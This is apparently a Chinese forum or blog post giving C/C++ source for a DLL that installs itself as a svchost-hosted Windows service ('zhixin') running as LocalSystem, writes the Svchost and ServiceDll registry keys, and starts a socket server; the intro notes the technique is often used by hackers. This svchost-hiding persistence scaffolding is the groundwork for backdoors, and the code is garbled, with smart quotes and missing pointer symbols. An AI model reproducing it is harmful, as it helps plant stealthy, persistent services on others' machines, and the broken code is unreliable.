Svchost本身只是作为服务宿主,并不实现任何服务功能,需要Svchost启动的服务以动态链接库形式实现,在安装这些服务时,把服务的可执行程序指向svchost,启动这些服务时由svchost调用相应服务的动态链接库来启动服务。常被黑客利用。mySocket是一个socket通讯类。若需要请发邮件到[email protected]。
【[C/C++]代码】
#include “stdafx.h”
#include <windows.h>
#include <tlhelp32.h>
#include “mySocket.h”
char chServiceName[] = “zhixin”;
char chDescription[] = “”;
//服务句柄
SERVICE_STATUS_HANDLE hServiceStatus;
//服务状态
SERVICE_STATUS ServiceStatus;
//进程ID
DWORD dwThreadId;
mySocket sock;
/**
- 查看某进程是否调用了某个dll
- @param dwPid 进程编号
- @param dll dll文件路径
- return 被调用返回真,没有调用则返回假
/
BOOL ExistsDll(DWORD dwPid, char dll)
{
BOOL re = false;
HANDLE hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPid);
if(hProcess != INVALID_HANDLE_VALUE)
{
MODULEENTRY32 me32 = {0};
me32.dwSize = sizeof( MODULEENTRY32 );
BOOL moreProc = Module32First(hProcess, &me32); //获取第一个进程的信息
while(moreProc)
{
if(strcmp(me32.szExePath, dll) == 0)
{
re = true;
break;
}
moreProc = Module32Next(hProcess, &me32);
}
CloseHandle(hProcess);
}
return re;
}
/ - 服务任务
/
void doAction()
{
sock.startServer();
}
/* - 修改字符串类型键值
/
BOOL CreateStringReg(HKEY hRoot,char szSubKey, unsigned long kType,char ValueName,char Data)
{
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
if (lRet!=ERROR_SUCCESS) return false;
//修改注册表键值,没有则创建它
lRet=RegSetValueEx(hKey, ValueName, 0, kType, (BYTE)Data,strlen(Data));
if (lRet!=ERROR_SUCCESS) return false;
RegCloseKey(hKey);
return true;
}
/* - 用于修改数字类型键值
/
BOOL CreateDWORDReg(HKEY hRoot,char szSubKey,char ValueName,DWORD Data)
{
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
if (lRet!=ERROR_SUCCESS) return false;
DWORD dwSize=sizeof(DWORD);
//修改注册表键值,没有则创建它
lRet=RegSetValueEx(hKey,ValueName,0,REG_DWORD,(BYTE)&Data,dwSize);
if (lRet!=ERROR_SUCCESS) return false;
RegCloseKey(hKey);
return true;
}
extern “C” _declspec(dllexport) void Install()
{
SC_HANDLE hscm = NULL, schService = NULL;
char *bin = “%SystemRoot%\System32\svchost.exe -k zhixin”;//安装服务,zhixin代表属于svchost的那个服务组
char *dll = “%SystemRoot%\system32\test.dll”;
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if(hscm == NULL)
{
OutputDebugString(“OpenSCManager error\n”);
return ;
}
schService = CreateService(
hscm, // SCManager database
chServiceName, // name of service
chServiceName, // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_SHARE_PROCESS,// service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
bin, // service’s binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL)
{
OutputDebugString(“CreateService(‘zhixin’) error\n”);
return ;
}
CloseServiceHandle(schService);
CloseServiceHandle(hscm);
//添加注册表配置项
CreateStringReg(HKEY_LOCAL_MACHINE, “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost”, REG_MULTI_SZ,
chServiceName, //组名
“zhixin\0\0”); //服务名对应SYSTEM\CurrentControlSet\Services\下面的某项,服务名之间用NULL分割,以两个NULL结束
CreateStringReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”, REG_EXPAND_SZ, “ImagePath”, bin);
CreateStringReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”, REG_SZ, “DisplayName”, chServiceName);
CreateStringReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”, REG_SZ, “Description”, chDescription);
CreateStringReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”, REG_SZ, “ObjectName”, “LocalSystem”);
CreateDWORDReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”, “ErrorControl”, 1);
CreateDWORDReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”, “Start”, 2);
CreateStringReg(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin\Parameters”, REG_EXPAND_SZ, “ServiceDll”, dll);
}
extern “C” _declspec(dllexport) void UnInstall()
{
HKEY hKey;
SC_HANDLE hSCM = NULL, hService = NULL;
SERVICE_STATUS ServiceStatus;
//卸载服务
hSCM = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(!hSCM)
{
OutputDebugString(“OpenSCManager error\n”);
return ;
}
hService = OpenService(hSCM, chServiceName, SERVICE_STOP | DELETE);
if(!hService)
{
OutputDebugString(“OpenService error\n”);
return ;
}
//停止服务
ControlService(hService, SERVICE_CONTROL_STOP, &ServiceStatus);
DeleteService(hService);
//释放服务
CloseServiceHandle(hSCM);
CloseServiceHandle(hService);
//清除注册表配置项
long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost”, 0, KEY_ALL_ACCESS, &hKey);
if(lRet == ERROR_SUCCESS)
{
lRet = RegDeleteValue(hKey, “zhixin”);
RegCloseKey(hKey);
}
RegDeleteKey(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin\Parameters”);
RegDeleteKey(HKEY_LOCAL_MACHINE, “SYSTEM\CurrentControlSet\Services\zhixin”);
}
void __stdcall ServiceHandler( DWORD dwCommand )
{
switch(dwCommand)
{
case SERVICE_CONTROL_STOP://停止服务
sock.stopServer();
ServiceStatus.dwCurrentState = SERVICE_STOPPED;//SERVICE_STOP_PENDING;
SetServiceStatus(hServiceStatus, &ServiceStatus);
OutputDebugString(“SERVICE_CONTROL_STOP\n”);
break;
case SERVICE_CONTROL_PAUSE:
break;
case SERVICE_CONTROL_CONTINUE:
break;
case SERVICE_CONTROL_INTERROGATE:
break;
case SERVICE_CONTROL_SHUTDOWN:
break;
case SERVICE_CONTROL_PARAMCHANGE:
break;
default:
break;
}
}
//extern “C” __declspec(dllexport) void WINAPI ServiceMain( int argc, wchar_t *argv[] )
extern “C” __declspec(dllexport) void ServiceMain( int argc, wchar_t argv[] )
//void __stdcall ServiceMain(int argc, wchar_t argv[])
{
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
hServiceStatus = RegisterServiceCtrlHandler(chServiceName, ServiceHandler);
if(!hServiceStatus)
{
OutputDebugString(“RegisterServiceCtrlHandler error\n”);
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
//设置服务为运行状态
if(SetServiceStatus(hServiceStatus, &ServiceStatus)==0)
{
OutputDebugString(“SetServiceStatus Error !\n”);
return ;
}
doAction();
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}